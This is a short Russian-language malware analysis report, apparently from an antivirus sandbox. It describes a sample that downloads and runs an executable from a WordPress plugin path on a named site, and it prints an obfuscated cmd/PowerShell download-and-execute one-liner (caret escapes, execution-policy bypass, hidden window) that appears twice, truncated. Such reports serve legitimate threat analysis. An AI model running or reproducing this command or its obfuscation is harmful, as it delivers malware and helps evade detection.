Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "po^weRSHe^L^l.Exe^ -EXE^cUT^iO^Np^OLicY Byp^ASS -no^PR^OFiLE ^-wI^NDo^wStyL^e hId^d^eN^ (nE^W-OB^jE^cT ^s^Y^stE^M^.^net.wE^b^cl^Ien^t)^.^dO^W^N^lO^ADF^I^LE('http://nsholiday.com/w...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ns###iday.com':80
TCP
Запросы HTTP GET
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
UDP
- DNS ASK ns###iday.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "po^weRSHe^L^l.Exe^ -EXE^cUT^iO^Np^OLicY Byp^ASS -no^PR^OFiLE ^-wI^NDo^wStyL^e hId^d^eN^ (nE^W-OB^jE^cT ^s^Y^stE^M^.^net.wE^b^cl^Ien^t)^.^dO^W^N^lO^ADF^I^LE('http://nsholiday.com/w...' (со скрытым окном)
